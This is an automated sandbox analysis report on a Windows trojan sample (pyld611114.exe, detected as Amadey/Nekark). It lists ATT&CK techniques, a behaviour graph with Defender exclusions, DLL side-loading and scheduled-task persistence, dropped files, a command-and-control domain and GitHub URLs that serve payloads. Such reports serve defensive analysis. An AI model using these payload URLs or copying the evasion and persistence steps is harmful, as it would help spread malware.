Scheduled Task/Job		11
Process Injection		2
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution		Login Hook1
Scheduled Task/Job		1
DLL Side-Loading		NTDS42
System Information Discovery		Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
File Deletion		LSA Secrets331
Security Software Discovery		SSHKeylogging2
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
Masquerading		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync131
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
Virtualization/Sandbox Evasion		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577366 Sample: pyld611114.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 147 runvrs.com 2->147 149 raw.githubusercontent.com 2->149 151 2 other IPs or domains 2->151 165 Antivirus detection for dropped file 2->165 167 Antivirus / Scanner detection for submitted sample 2->167 169 Multi AV Scanner detection for dropped file 2->169 171 11 other signatures 2->171 14 pyld611114.exe 1 2->14         started        18 svchost.exe 2->18         started        21 svchost.exe 1 1 2->21         started        23 console_zero.exe 2->23         started        signatures3 process4 dnsIp5 145 C:\Windows\System32\usvcinsta64.exe, PE32+ 14->145 dropped 207 Self deletion via cmd or bat file 14->207 209 Adds a directory exclusion to Windows Defender 14->209 25 cmd.exe 1 14->25         started        28 cmd.exe 1 14->28         started        30 cmd.exe 1 14->30         started        153 runvrs.com 188.116.21.204, 49844, 49901, 49929 NEPHAX-ASPL Poland 18->153 155 github.com 20.233.83.145, 443, 49860, 49872 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->155 159 2 other IPs or domains 18->159 211 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->211 32 cmd.exe 18->32         started        34 cmd.exe 18->34         started        36 cmd.exe 18->36         started        42 5 other processes 18->42 157 127.0.0.1 unknown unknown 21->157 38 cmd.exe 23->38         started        40 cmd.exe 23->40         started        file6 signatures7 process8 signatures9 185 Drops executables to the windows directory (C:\Windows) and starts them 25->185 44 2 other processes 25->44 187 Uses schtasks.exe or at.exe to add and modify task schedules 28->187 189 Adds a directory exclusion to Windows Defender 28->189 48 2 other processes 28->48 50 2 other processes 30->50 52 2 other processes 32->52 54 2 other processes 34->54 56 2 other processes 36->56 58 2 other processes 38->58 60 2 other processes 40->60 62 10 other processes 42->62 process10 file11 141 C:\Windows \System32\printui.dll, PE32+ 44->141 dropped 143 C:\Windows \System32\printui.exe, PE32+ 44->143 dropped 195 Antivirus detection for dropped file 44->195 197 Multi AV Scanner detection for dropped file 44->197 199 Adds a directory exclusion to Windows Defender 44->199 64 cmd.exe 1 44->64         started        67 cmd.exe 1 44->67         started        69 cmd.exe 1 44->69         started        71 2 other processes 44->71 201 Loading BitLocker PowerShell Module 56->201 signatures12 process13 signatures14 161 Drops executables to the windows directory (C:\Windows) and starts them 64->161 73 printui.exe 64->73         started        77 conhost.exe 64->77         started        163 Adds a directory exclusion to Windows Defender 67->163 79 powershell.exe 22 67->79         started        81 conhost.exe 67->81         started        83 powershell.exe 23 69->83         started        85 conhost.exe 69->85         started        87 conhost.exe 71->87         started        89 conhost.exe 71->89         started        91 timeout.exe 71->91         started        process15 file16 133 C:\Windows\System32\zlib1.dll, PE32+ 73->133 dropped 135 C:\Windows\System32\x816796.dat, PE32+ 73->135 dropped 137 C:\Windows\System32\ucrtbased.dll, PE32+ 73->137 dropped 139 9 other files (7 malicious) 73->139 dropped 191 Adds a directory exclusion to Windows Defender 73->191 93 cmd.exe 73->93         started        96 cmd.exe 73->96         started        98 cmd.exe 73->98         started        100 cmd.exe 73->100         started        193 Loading BitLocker PowerShell Module 79->193 signatures17 process18 signatures19 203 Drops executables to the windows directory (C:\Windows) and starts them 93->203 102 console_zero.exe 93->102         started        105 conhost.exe 93->105         started        205 Adds a directory exclusion to Windows Defender 96->205 107 powershell.exe 96->107         started        109 conhost.exe 96->109         started        111 reg.exe 98->111         started        113 conhost.exe 98->113         started        115 sc.exe 98->115         started        117 sc.exe 98->117         started        119 2 other processes 100->119 process20 signatures21 173 Antivirus detection for dropped file 102->173 175 Multi AV Scanner detection for dropped file 102->175 177 Found API chain indicative of debugger detection 102->177 179 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 102->179 121 cmd.exe 102->121         started        123 cmd.exe 102->123         started        181 Loading BitLocker PowerShell Module 107->181 183 Creates a Windows Service pointing to an executable in C:\Windows 111->183 process22 process23 125 conhost.exe 121->125         started        127 schtasks.exe 121->127         started        129 conhost.exe 123->129         started        131 schtasks.exe 123->131         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
pyld611114.exe76%ReversingLabsWin64.Trojan.Amadey
pyld611114.exe100%AviraTR/AD.Nekark.dzein
pyld611114.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows \System32\printui.dll100%AviraTR/Crypt.Agent.uguls
C:\Windows\System32\x816796.dat100%AviraTR/Agent.gjkfm
C:\Windows\System32\usvcinsta64.exe100%AviraTR/AD.Nekark.jksvb
C:\Windows\System32\console_zero.exe100%AviraTR/AVI.Agent.iscto
C:\Windows\System32\x816796.dat100%Joe Sandbox ML
C:\Windows \System32\printui.dll75%ReversingLabsWin64.Trojan.Lazy
C:\Windows \System32\printui.exe0%ReversingLabs
C:\Windows\System32\console_zero.exe71%ReversingLabsWin64.Trojan.Lazy
C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
C:\Windows\System32\libcurl.dll0%ReversingLabs
C:\Windows\System32\libiconv-2.dll0%ReversingLabs
C:\Windows\System32\libintl-9.dll0%ReversingLabs
C:\Windows\System32\libpq.dll0%ReversingLabs
C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
C:\Windows\System32\ucrtbased.dll0%ReversingLabs
C:\Windows\System32\usvcinsta64.exe83%ReversingLabsWin64.Trojan.Leonem
C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
C:\Windows\System32\x816796.dat71%ReversingLabsWin64.Trojan.Generic
C:\Windows\System32\zlib1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://schemas.mi0%Avira URL Cloudsafe
http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
runvrs.com
188.116.21.204
truefalse
    		unknown
    bg.microsoft.map.fastly.net
    		199.232.210.172
    		truefalse
      		high
      ipinfo.io
      		34.117.59.81
      		truefalse
        		high
        github.com
        		20.233.83.145
        		truefalse
          		high
          raw.githubusercontent.com
          		185.199.110.133
          		truefalse
            		high
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.misvchost.exe, 00000013.00000002.3449448298.000001F6CDEB0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://curl.se/docs/http-cookies.htmlpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpfalse
                		high
                https://www.gnu.org/licenses/pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpfalse
                  		high
                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.ver)svchost.exe, 00000013.00000002.3450915324.000001F6D3611000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/alt-svc.htmlpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpfalse
                        		high
                        https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.datsvchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.openssl.org/svchost.exefalse
                            		high
                            https://curl.se/docs/hsts.htmlpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpfalse
                              		high
                              https://curl.se/docs/alt-svc.html#console_zero.exefalse
                                		high
                                https://curl.se/docs/copyright.htmlDpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpfalse
                                  		high
                                  https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.datsvchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://curl.se/svchost.exe, console_zero.exefalse
                                      		high
                                      https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000013.00000003.2384375707.000001F6D33CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.zlib.net/svchost.exefalse
                                          		high
                                          http://mingw-w64.sourceforge.net/Xpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3447936117.0000000064953000.00000008.00000001.01000000.00000012.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://curl.se/docs/copyright.htmlsvchost.exe, console_zero.exefalse
                                            		high
                                            http://worldtimeapi.org/api/timezone/Etc/UTCconsole_zero.exe, 0000002D.00000002.2563177329.000001D7ED32C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.zlib.net/Dpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452208317.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564413372.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                		high
                                                https://curl.se/docs/hsts.html#console_zero.exefalse
                                                  		high
                                                  https://ipinfo.io/jsonpyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                    		high
                                                    https://www.openssl.org/Hpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000002A.00000002.3450978095.00007FFD9408E000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      		high
                                                      https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.datsvchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, console_zero.exe, 0000002D.00000000.2532139890.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000002D.00000002.2563922460.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmpfalse
                                                          		high
                                                          https://curl.se/docs/http-cookies.html#console_zero.exefalse
                                                            		high
                                                            https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.datsvchost.exe, 0000002A.00000002.3450200488.00000266EA924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.datsvchost.exe, 0000002A.00000002.3449969880.00000266EA90F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.gnu.org/licenses/pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmpfalse
                                                                  		high
                                                                  https://curl.se/Vpyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    34.117.59.81
                                                                    		ipinfo.ioUnited States
                                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                    188.116.21.204
                                                                    		runvrs.comPoland
                                                                    		43333NEPHAX-ASPLfalse
                                                                    20.233.83.145
                                                                    		github.comUnited States
                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    185.199.110.133
                                                                    		raw.githubusercontent.comNetherlands
                                                                    		54113FASTLYUSfalse

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1577366
                                                                    Start date and time:2024-12-18 12:40:13 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 11m 28s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:94
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:pyld611114.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.evad.winEXE@125/51@4/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 71.4%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 40.126.53.16, 20.223.35.26, 13.107.246.63, 2.16.158.179, 52.149.20.212, 150.171.27.10, 2.16.158.83, 20.199.58.43
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                    • Execution Graph export aborted for target pyld611114.exe, PID 7528 because there are no executed function
                                                                    • Execution Graph export aborted for target usvcinsta64.exe, PID 4900 because there are no executed function
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • VT rate limit hit for: pyld611114.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    06:41:23API Interceptor116x Sleep call for process: powershell.exe modified
                                                                    06:41:30API Interceptor8x Sleep call for process: svchost.exe modified
                                                                    06:41:47API Interceptor2x Sleep call for process: console_zero.exe modified
                                                                    12:41:47Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                    • ipinfo.io/json
                                                                    Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                    • ipinfo.io/json
                                                                    idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                    • ipinfo.io/json
                                                                    FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                    • ipinfo.io/json
                                                                    licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                    • ipinfo.io/ip
                                                                    188.116.21.204dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                      SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                        app64.exeGet hashmaliciousUnknownBrowse
                                                                          20.233.83.145Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                          • github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ipinfo.ioYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          https://bu.marcel-andree.de/Get hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                          • 34.117.59.81
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                          • 34.117.59.81
                                                                          http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                          • 34.117.59.81
                                                                          runvrs.comLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                                                                          • 38.180.213.183
                                                                          github.comLu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 20.233.83.145
                                                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 140.82.113.4
                                                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 20.233.83.145
                                                                          ORDER-2412180Y6890PF57682456HTVC789378909759..jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                          • 20.233.83.145
                                                                          IAK4Rn3bfO.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                          • 20.233.83.145
                                                                          ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                          • 140.82.121.3
                                                                          3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                          • 140.82.113.4
                                                                          uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                          • 20.233.83.145
                                                                          bg.microsoft.map.fastly.netLu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 199.232.214.172
                                                                          do.ps1Get hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
                                                                          • 199.232.210.172
                                                                          YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 199.232.210.172
                                                                          xxx.ps1Get hashmaliciousAsyncRATBrowse
                                                                          • 199.232.210.172
                                                                          KE2yNJdV55.exeGet hashmaliciousPureCrypterBrowse
                                                                          • 199.232.210.172
                                                                          LA0gY3d103.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 199.232.210.172
                                                                          JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                          • 199.232.214.172
                                                                          uzI7DAON53.exeGet hashmaliciousPureCrypterBrowse
                                                                          • 199.232.210.172
                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          NEPHAX-ASPLdYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.116.21.204
                                                                          SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.116.21.204
                                                                          app64.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.116.21.204
                                                                          yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.116.38.155
                                                                          n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.116.38.155
                                                                          2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.116.38.155
                                                                          HDTFFrAXui.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                          • 91.203.133.60
                                                                          oOXIv15Q0s.exeGet hashmaliciousRemcosBrowse
                                                                          • 188.116.23.142
                                                                          vN2gDDbcxM.exeGet hashmaliciousRedLineBrowse
                                                                          • 188.116.21.141
                                                                          https://deepakroadlines.in/styles?i3=5mmdc://t987-h91k7o-ulwvpvlzu.w.lg8o7cmlm4slddc.37m?4c=dGFyYS5sYWZlcmxhQGdlbGl0YS5jb20=Get hashmaliciousUnknownBrowse
                                                                          • 91.203.134.140
                                                                          FASTLYUSLu4421.exeGet hashmaliciousStealeriumBrowse
                                                                          • 185.199.111.133
                                                                          Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 185.199.108.133
                                                                          do.ps1Get hashmaliciousUnknownBrowse
                                                                          • 151.101.1.91
                                                                          http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                          • 151.101.194.208
                                                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                          • 185.199.109.133
                                                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                          • 185.199.110.133
                                                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 185.199.108.133
                                                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                          • 185.199.110.133
                                                                          http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                          • 151.101.2.137
